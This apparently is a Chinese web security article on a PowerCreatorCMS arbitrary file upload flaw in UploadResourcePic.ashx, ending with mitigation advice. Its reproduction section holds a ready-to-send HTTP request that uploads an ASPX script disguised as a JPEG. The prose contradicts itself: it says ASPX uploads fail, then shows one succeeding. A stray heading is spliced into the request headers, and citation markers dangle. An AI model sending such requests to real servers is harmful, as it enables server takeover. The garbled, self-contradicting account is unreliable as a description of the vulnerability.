当前位置: 首页> 网络安全> 正文

PowerCreatorCMS UploadResourcePic 任意文件上传漏洞

PowerCreatorCMS UploadResourcePic 任意文件上传漏洞

漏洞概述

PowerCreatorCMS是一个存在多个漏洞的网站构建框架,其中包括了UploadResourcePic.ashx 文件上传漏洞。这个漏洞源于CMS编辑器未对文件上传做任何校验,允许攻击者利用漏洞上传任意格式文件,从而获得服务器控制权1

漏洞利用过程

攻击者可以通过构造恶意请求,上传包含恶意代码的文件,从而执行任意代码。在UploadResourcePic.ashx 文件中,攻击者可以利用编辑器上传txt和html文件,但不能上传aspx文件,这使得攻击者难以直接获取shell。然而,通过对文件名的分析,可以发现攻击者可能通过其他方法上传了webshell1

漏洞复现

研究人员已经对UploadResourcePic.ashx 漏洞进行了复现,并发现可以通过编辑器上传文件,但只能上传txt和html格式的文件,无法上传aspx文件。此外,他们还发现了一个可能的上传点,即upload目录下的UploadResourcePic.ashx 文件1

POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1

PowerCreatorCMS UploadResourcePic 任意文件上传漏洞

Host: 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0

Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136

Accept-Encoding: gzip, deflate

Connection: close

 

-----------------------------20873900192357278038549710136

Content-Disposition: form-data; name="file1"; filename="qaz.aspx"

Content-Type: image/jpeg

 

<%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%>

-----------------------------20873900192357278038549710136--

漏洞影响

由于PowerCreatorCMS的漏洞描述中提到,厂商均未提供修复方案,这表明所有使用该CMS系统的网站都可能受到此漏洞的影响。攻击者可以利用这些漏洞上传恶意文件,进而控制整个网站服务器1

结论

综上所述,PowerCreatorCMS的UploadResourcePic.ashx 文件上传漏洞是由于编辑器未对上传文件进行有效校验导致的。攻击者可以利用这个漏洞上传任意格式的文件,从而获得服务器控制权。由于厂商没有提供修复方案,所有使用该CMS的网站都可能存在风险。建议用户尽快采取措施,如设置上传白名单、禁止脚本文件执行、限制文件上传类型等,以防止此类漏洞的利用。同时,也应该关注厂商是否发布了新的补丁或修复程序,及时更新系统以保障网站安全。